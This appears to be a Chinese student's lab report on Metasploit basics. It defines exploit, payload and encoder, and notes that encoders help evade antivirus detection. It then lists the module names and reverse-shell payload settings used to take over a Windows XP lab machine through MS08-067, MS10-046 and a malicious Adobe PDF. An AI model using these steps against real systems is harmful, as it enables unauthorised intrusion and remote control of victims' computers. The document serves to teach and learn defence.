20145239杜文超《網絡攻防》- MSF基礎應用
基礎問題回答
1、用自己的話解釋什麼是exploit,payload,encode?
- exploit:實作攻擊行為的主體,但沒有載荷隻是一個空殼。沒有子彈的槍是很好的比喻。
- payload:載荷。一般指shellcode,攻擊成功後需要運作的東西。
- encode:編碼器。使得我們的攻擊中不會出現“壞字元”,也可以通過編碼改變特征碼,實作免殺。
實驗總結與體會
msf僅僅是一個攻擊平台,攻擊具體的實作還是要靠抓住靶機上的漏洞進行。本次實驗我對metasploit的體系結構有了初步的認識。尤其是對6個主要子產品的功能和用途有了深入了解和實踐經驗。我也深刻的認識到在現實中想要真正攻陷一台靶機還是有難度的,因為本次實驗我使用的靶機是win xp sp3英文版系統。很老,應該算是被淘汰的了,是以才會有那麼多漏洞讓我可以抓住去攻擊,現在windows版本不斷更新,漏洞更新檔的更新速度也越來越快,是以更展現出了0 day漏洞的價值。
實驗過程
實驗環境配置
攻擊機:Kali(IP:192.168.248.128)
靶機:Windows XP SP3(IP:192.168.248.129)
MS08_067漏洞滲透攻擊
1、先用search ms08_067指令查詢該攻擊子產品。
2、輸入use exploit/windows/smb/ms08_067_netapi使用該子產品,并用show payloads指令檢視一下要用的payload。
3、輸入set payload generic/shell_reverse_tcp設定一下payload,通過反向連接配接擷取shell。
4、使用show options指令檢視需要進行的配置。
5、如圖所示進行配置,設定RHOST為遠端靶機IP位址、LHOST為主機IP位址。
6、設定完成後再次确認剛才的設定。
7、輸入exploit發起攻擊。
8、攻擊成功,成功擷取靶機系統shell。
對浏覽器攻擊:ms10_046漏洞攻擊
1、先利用search ms10_046指令檢視可以運用的攻擊子產品.
2、使用該漏洞進行攻擊。
3、設定相關參數。SRVHOST是本地監聽主機的IP位址,LHOST是監聽的IP位址,都填攻擊者本機IP位址。
4、發起攻擊,可以看到,生成了url連結位址。
5、我們使用靶機的IE浏覽器登陸一下剛才生成的url位址。
6、發現主機這邊已經攻擊成功了。
7、使用指令sessions -i 1開始連接配接,成功得到shell。
對Adobe的漏洞攻擊:adobe_pdf_embedded_exe
1、進入檔案攻擊目錄選擇一個合适的adobe漏洞。
2、我選擇的是adobe_pdf_embedded_exe,use這個漏洞。
3、設定一下payload攻擊有效載荷:set payload windows/meterpreter/reverse_tcp
4、show options檢視需要進行哪些配置。
5、設定檔案名稱5239.pdf,LHOST為攻擊者主機IP。
6、再次使用show options檢查配置。
7、發起攻擊。發現生成了一個名為5239的pdf檔案。
8、把攻擊主機設定為監聽狀态,方法和以前的實驗類似。
9、将該pdf拷貝到靶機上然後打開。
10、攻擊機已經成功擷取到靶機shell。
輔助子產品的應用:scanner/http/dir_listing
1、先用search了解一下有關scanner/http/dir_listing的相關資訊。
2、設定相關參數。
3、run,運作成功。